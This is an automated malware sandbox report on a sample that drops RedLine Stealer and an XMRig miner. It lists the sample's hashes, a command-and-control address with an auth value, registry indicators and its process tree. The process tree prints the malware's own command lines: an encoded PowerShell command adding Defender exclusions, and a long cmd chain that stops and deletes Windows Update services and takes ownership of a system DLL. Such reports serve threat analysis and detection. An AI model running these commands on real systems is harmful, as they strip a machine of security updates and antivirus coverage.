Analysis
max time kernel: 168s
max time network: 174s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-08-2022 12:12
Behavioral task: behavioral1
Sample: 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Resource: win7-20220718-en

Behavioral task: behavioral2
Sample: 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Resource: win10v2004-20220721-en
General
Target: 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Size: 128KB
MD5: a7661b5802ed9c34ca2244e90efc83ce
SHA1: 94fc10dd134800e663dca7af716e1cea0687bd02
SHA256: 847e1e62de8a0e2f7e2a2024f74131bfd9ce8c81ebed2ce53e83d11516487443
SHA512: e3f19fb7518ea481f050441a868c86b90287ca256a5342beb602bfea18ba951db17866519b3a2d7d65f18a1c20839336e14134dbf30f050128e8fa3bb3bd91eb
Malware Config
Extracted
redline
LogsDiller Cloud (Sup: @mr_golds)
193.233.193.14:8163
auth_value: 56c6f7b9024c076f0a96931453da7e56
Signatures

Modifies security service 2 TTPs 5 IoCs
Processes:
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | schtasks.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | schtasks.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | schtasks.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | schtasks.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | schtasks.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 1 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/4696-130-0x0000000000B90000-0x0000000000BB0000-memory.dmp | family_redline
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 11.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
XMRig Miner payload 5 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3132-259-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
  behavioral2/memory/3132-261-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
  behavioral2/memory/3132-263-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
  behavioral2/memory/3132-265-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
  behavioral2/memory/3132-267-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe

Executes dropped EXE 2 IoCs
Processes:
  pid | process
  312 | 11.exe
  2012 | updater.exe
Possible privilege escalation attempt 4 IoCs
Processes:
  pid | process
  2336 | takeown.exe
  1040 | icacls.exe
  1968 | takeown.exe
  3484 | icacls.exe

Stops running service(s) 3 TTPs
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 11.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 11.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe

Modifies file permissions 1 TTPs 4 IoCs
Processes:
  pid | process
  2336 | takeown.exe
  1040 | icacls.exe
  1968 | takeown.exe
  3484 | icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\11.exe | themida
  C:\Users\Admin\AppData\Local\Temp\11.exe | themida
  behavioral2/memory/312-146-0x0000000000400000-0x0000000001066000-memory.dmp | themida
  behavioral2/memory/312-147-0x0000000000400000-0x0000000001066000-memory.dmp | themida
  C:\Program Files\Google\Chrome\updater.exe | themida
  C:\Program Files\Google\Chrome\updater.exe | themida
  behavioral2/memory/2012-210-0x0000000000400000-0x0000000001066000-memory.dmp | themida
  behavioral2/memory/2012-211-0x0000000000400000-0x0000000001066000-memory.dmp | themida
  behavioral2/memory/2012-213-0x0000000000400000-0x0000000001066000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 11.exe
Drops file in System32 directory 6 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
  pid | process
  312 | 11.exe
  2012 | updater.exe

Suspicious use of SetThreadContext 1 IoCs
Processes:
  description | pid | process | target process
  PID 792 set thread context of 3132 | 792 | conhost.exe | explorer.exe
Drops file in Program Files directory 5 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
  File created | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
  File opened for modification | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f9fa7abc-0d49-4de9-b1cd-f36835128bfb.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220807141424.pma | setup.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  4108 | sc.exe
  5076 | sc.exe
  5000 | sc.exe
  3928 | sc.exe
  372 | sc.exe
  2224 | sc.exe
  4852 | sc.exe
  3140 | sc.exe
  5092 | sc.exe
  4192 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.EXE
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | conhost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | conhost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Modifies registry class 1 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe

Modifies registry key 1 TTPs 18 IoCs
Processes:
  pid | process
  reg.exe with PIDs 4364, 4168, 3584, 2188, 2192, 1472, 3292, 4364, 2160, 1776, 4676, 1860, 4920, 1612, 2852, 3840, 4552, 1052
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process
  4696 | 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
  1244 | powershell.exe (x2)
  5028 | conhost.exe
  4416 | powershell.exe (x2)
  3316 | msedge.exe (x2)
  5048 | msedge.exe (x2)
  3144 | powershell.EXE (x3)
  2064 | powershell.exe (x3)
  516 | identity_helper.exe (x2)
  792 | conhost.exe (x2)
  3132 | explorer.exe (x44)

Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid | process
  644 | (process name not recorded in the report)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
  pid | process
  5048 | msedge.exe (x5)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4696 | 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
  Token: SeDebugPrivilege | 1244 | powershell.exe
  Token: SeDebugPrivilege | 5028 | conhost.exe
  Token: SeShutdownPrivilege | 4928 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4928 | powercfg.exe
  Token: SeShutdownPrivilege | 4424 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4424 | powercfg.exe
  Token: SeShutdownPrivilege | 2952 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2952 | powercfg.exe
  Token: SeShutdownPrivilege | 1472 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 1472 | powercfg.exe
  Token: SeTakeOwnershipPrivilege | 1968 | takeown.exe
  Token: SeDebugPrivilege | 4416 | powershell.exe
  The following 21 entries, all for PID 4416 powershell.exe, are recorded in this order twice in full and then the first nine of them a third time (51 entries, bringing the total to 64):
  Token: SeIncreaseQuotaPrivilege | 4416 | powershell.exe
  Token: SeSecurityPrivilege | 4416 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4416 | powershell.exe
  Token: SeLoadDriverPrivilege | 4416 | powershell.exe
  Token: SeSystemProfilePrivilege | 4416 | powershell.exe
  Token: SeSystemtimePrivilege | 4416 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4416 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4416 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4416 | powershell.exe
  Token: SeBackupPrivilege | 4416 | powershell.exe
  Token: SeRestorePrivilege | 4416 | powershell.exe
  Token: SeShutdownPrivilege | 4416 | powershell.exe
  Token: SeDebugPrivilege | 4416 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4416 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4416 | powershell.exe
  Token: SeUndockPrivilege | 4416 | powershell.exe
  Token: SeManageVolumePrivilege | 4416 | powershell.exe
  Token: 33 | 4416 | powershell.exe
  Token: 34 | 4416 | powershell.exe
  Token: 35 | 4416 | powershell.exe
  Token: 36 | 4416 | powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
  pid | process
  5048 | msedge.exe (x3)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 4696 wrote to memory of 312 | 4696 | 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe | 11.exe (x2)
  PID 312 wrote to memory of 5028 | 312 | 11.exe | conhost.exe (x3)
  PID 4696 wrote to memory of 5048 | 4696 | 2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe | msedge.exe (x2)
  PID 5048 wrote to memory of 4276 | 5048 | msedge.exe | msedge.exe (x2)
  PID 5028 wrote to memory of 1244 | 5028 | conhost.exe | powershell.exe (x2)
  PID 5028 wrote to memory of 4892 | 5028 | conhost.exe | cmd.exe (x2)
  PID 5028 wrote to memory of 4908 | 5028 | conhost.exe | cmd.exe (x2)
  PID 4892 wrote to memory of 5092 | 4892 | cmd.exe | sc.exe (x2)
  PID 4908 wrote to memory of 4928 | 4908 | cmd.exe | powercfg.exe (x2)
  PID 4892 wrote to memory of 4192 | 4892 | cmd.exe | sc.exe (x2)
  PID 4908 wrote to memory of 4424 | 4908 | cmd.exe | powercfg.exe (x2)
  PID 4892 wrote to memory of 372 | 4892 | cmd.exe | sc.exe (x2)
  PID 4908 wrote to memory of 2952 | 4908 | cmd.exe | powercfg.exe (x2)
  PID 4908 wrote to memory of 1472 | 4908 | cmd.exe | powercfg.exe (x2)
  PID 4892 wrote to memory of 3928 | 4892 | cmd.exe | schtasks.exe (x2)
  PID 4892 wrote to memory of 5076 | 4892 | cmd.exe | sc.exe (x2)
  PID 4892 wrote to memory of 1612 | 4892 | cmd.exe | reg.exe (x2)
  PID 4892 wrote to memory of 3840 | 4892 | cmd.exe | schtasks.exe (x2)
  PID 5028 wrote to memory of 4416 | 5028 | conhost.exe | powershell.exe (x2)
  PID 4892 wrote to memory of 3292 | 4892 | cmd.exe | schtasks.exe (x2)
  PID 4892 wrote to memory of 2852 | 4892 | cmd.exe | reg.exe (x2)
  PID 4892 wrote to memory of 4364 | 4892 | cmd.exe | reg.exe (x2)
  PID 4892 wrote to memory of 1968 | 4892 | cmd.exe | takeown.exe (x2)
  PID 4892 wrote to memory of 3484 | 4892 | cmd.exe | icacls.exe (x2)
  PID 5048 wrote to memory of 400 | 5048 | msedge.exe | msedge.exe (x15)
Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
command line: "C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe"
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

  [depth 2] C:\Users\Admin\AppData\Local\Temp\11.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\11.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\conhost.exe
    command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\11.exe"
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\system32\sc.exe
        command line: sc stop UsoSvc
        - Launches sc.exe

        [depth 5] C:\Windows\system32\sc.exe
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe

        [depth 5] C:\Windows\system32\sc.exe
        command line: sc stop bits
        - Launches sc.exe

        [depth 5] C:\Windows\system32\sc.exe
        command line: sc stop dosvc
        - Launches sc.exe

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\takeown.exe
        command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\system32\icacls.exe
        command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\sc.exe
        command line: sc stop wuauserv
        - Launches sc.exe

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\reg.exe
        command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        - Modifies security service

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

        [depth 5] C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

        [depth 5] C:\Windows\system32\schtasks.exe
